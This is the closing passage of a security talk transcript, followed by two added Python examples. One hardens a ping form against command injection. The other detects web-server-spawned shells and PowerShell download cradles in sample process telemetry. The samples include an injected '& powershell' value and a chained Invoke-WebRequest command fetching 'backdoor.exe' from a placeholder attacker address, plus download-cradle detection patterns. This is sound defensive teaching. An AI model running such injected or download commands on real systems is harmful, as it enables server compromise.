There are multiple cases online where we're seeing people releasing some kind of tool and it's actually infected, right? So you suddenly have access to a security researcher's PC because they were dumb enough to run your tool without checking it. But tools such as Metasploit, Meterpreter, msfvenom,
those have been scrutinized by the security industry for many, many, many years. It's a very highly renowned company called Rapid7, which is developing it, and they have a quite good reputation, so to speak, right? So that's nice, at least. That gives you some assurance. Anyone else? Right?
So thank you very much, everyone. I'm glad we got a full pack of people in here. Thank you very much.
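The first defense the talk recaps is the one the web application missed: the ping form spliced the user's text into a shell command, and a whitelist of "numbers and dots" would have closed it. The following is an added example, not code from the talk or from the demo application, written in Python to show the vulnerable pattern beside a hardened version. The function names, the strict dotted-quad regex and the sample inputs are constructed for illustration; the injected string is the same shape as the one used in the demo.

```python
"""Added example (not from the talk): the ping/IP field from the demo, first as
the shell-string pattern that lets "& powershell ..." through, then hardened
with a strict whitelist and no shell. Names and inputs are constructed."""
import os
import re
import subprocess
from typing import List, Optional

# Whitelist for a plain IPv4 literal: four octets of 0-255, separated by dots,
# no leading zeros, nothing else. This is the "only numbers and dots" regex
# the talk recommends, tightened with a range check per octet.
OCTET = r"(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])"
IPV4_RE = re.compile(rf"{OCTET}\.{OCTET}\.{OCTET}\.{OCTET}")

# Windows ping takes -n for the packet count, Unix ping takes -c.
COUNT_FLAG = "-n" if os.name == "nt" else "-c"


def build_ping_command_vulnerable(user_input: str) -> str:
    """The 'before' pattern: user text is concatenated into one shell string.
    Anything after '&' becomes a second command for the shell to run."""
    return f"ping {COUNT_FLAG} 1 {user_input}"


def validate_ipv4(user_input: str) -> Optional[str]:
    """Return the address if the input is exactly one IPv4 literal, else None.
    fullmatch rejects shell metacharacters, spaces and trailing newlines; the
    octet pattern rejects values above 255 and leading zeros like '01'."""
    if IPV4_RE.fullmatch(user_input):
        return user_input
    return None


def build_ping_command_safe(user_input: str) -> Optional[List[str]]:
    """The hardened version: whitelist first, then pass the address as its own
    argv element so no shell ever parses it. Returns None on rejection."""
    addr = validate_ipv4(user_input)
    if addr is None:
        return None
    return ["ping", COUNT_FLAG, "1", addr]


def run_ping(user_input: str, timeout: float = 5.0) -> int:
    """Run the validated ping without a shell and return its exit status.
    Raises ValueError instead of running anything when the input is rejected."""
    argv = build_ping_command_safe(user_input)
    if argv is None:
        raise ValueError("input is not a plain IPv4 address")
    completed = subprocess.run(argv, shell=False, timeout=timeout,
                               capture_output=True)
    return completed.returncode


if __name__ == "__main__":
    injected = "192.0.2.10 & powershell -command ls"   # constructed, same shape as the demo
    print("vulnerable shell string:", build_ping_command_vulnerable(injected))
    print("hardened argv:", build_ping_command_safe(injected))   # None: rejected
    print("hardened argv:", build_ping_command_safe("192.0.2.10"))
```

The two changes work together: the whitelist stops the injected string at the door, and `shell=False` with a list argv means that even a future bug in the validator hands the text to `ping` as one argument rather than to a command interpreter.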
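The talk also points at what operations should have noticed: the Apache web server spawning a command shell, PowerShell being handed an Invoke-WebRequest download, and a server reaching out to the internet. The following is an added detection example, not code from the talk, written in Python over a handful of constructed process-creation events (parent pid, image, command line) in the style of endpoint telemetry; the field names, pids, images and addresses are assumptions and not any product's schema. It walks the parent chain, since in the demo the chain is httpd.exe, then cmd.exe, then powershell.exe, so the PowerShell process is a grandchild of the web server rather than a direct child.

```python
"""Added example (not from the talk): flag shells running under a web server,
command chaining in those shells, and PowerShell download cradles, using
constructed process-creation events. Schema and values are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List

WEB_SERVER_IMAGES = {"httpd.exe", "w3wp.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Common ways PowerShell is told to fetch a file from the network.
DOWNLOAD_CRADLE_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
# cmd.exe command separators: a benign "ping <ip>" has none of these.
CHAIN_RE = re.compile(r"[&|;]")


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    command_line: str
    user: str


def image_name(path: str) -> str:
    """Normalise a full image path to its lower-case file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_web_server_ancestor(ev: ProcessEvent, by_pid: Dict[int, ProcessEvent],
                            max_depth: int = 4) -> bool:
    """Walk up the parent chain a few levels looking for a web server image."""
    parent = by_pid.get(ev.ppid)
    depth = 0
    while parent is not None and depth < max_depth:
        if image_name(parent.image) in WEB_SERVER_IMAGES:
            return True
        parent = by_pid.get(parent.ppid)
        depth += 1
    return False


def classify(ev: ProcessEvent, by_pid: Dict[int, ProcessEvent]) -> List[str]:
    """Return the rule names that fire for one event (empty list = nothing)."""
    findings: List[str] = []
    name = image_name(ev.image)
    under_web = has_web_server_ancestor(ev, by_pid)
    if name in POWERSHELL_IMAGES and under_web:
        findings.append("powershell-under-web-server")
    if name in SHELL_IMAGES and under_web and CHAIN_RE.search(ev.command_line):
        findings.append("command-chaining-under-web-server")
    if name in SHELL_IMAGES and DOWNLOAD_CRADLE_RE.search(ev.command_line):
        findings.append("download-cradle")
    return findings


def scan(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Classify every event; return {pid: findings} for events that fired."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[str]] = {}
    for e in events:
        f = classify(e, by_pid)
        if f:
            hits[e.pid] = f
    return hits


# Constructed sample telemetry. 203.0.113.5 is a documentation address standing
# in for the attacker's host; "leetweb" is the web user from the demo.
SAMPLE_EVENTS = [
    ProcessEvent(300, 1, r"C:\Windows\explorer.exe", "explorer.exe", "admin"),
    ProcessEvent(400, 1, r"C:\Apache24\bin\httpd.exe", "httpd.exe -k runservice", "leetweb"),
    # The application's own, legitimate ping (still a shell under httpd, but no chaining).
    ProcessEvent(512, 400, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c ping -n 1 192.0.2.10", "leetweb"),
    # The injected request: ping, then a chained PowerShell download.
    ProcessEvent(600, 400, r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c ping -n 1 192.0.2.10 & powershell -command '
                 '"Invoke-WebRequest http://203.0.113.5/backdoor.exe '
                 '-OutFile %USERPROFILE%\\backdoor.exe"', "leetweb"),
    ProcessEvent(604, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -command "Invoke-WebRequest http://203.0.113.5/backdoor.exe '
                 '-OutFile %USERPROFILE%\\backdoor.exe"', "leetweb"),
    # An administrator's scheduled script: PowerShell, but not under the web server.
    ProcessEvent(700, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\backup.ps1", "admin"),
]
BY_PID = {e.pid: e for e in SAMPLE_EVENTS}

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        print(pid, image_name(BY_PID[pid].image), findings)
```

The benign ping (pid 512) produces no finding even though it is a shell under the web server, which is deliberate: the application shells out on every request, so a rule on "httpd spawned cmd.exe" alone would fire constantly. The chained command and the PowerShell grandchild are what separate the injection from normal traffic, and either alert arriving from a server that should have no outbound internet access is the point at which the talk says operations ought to react.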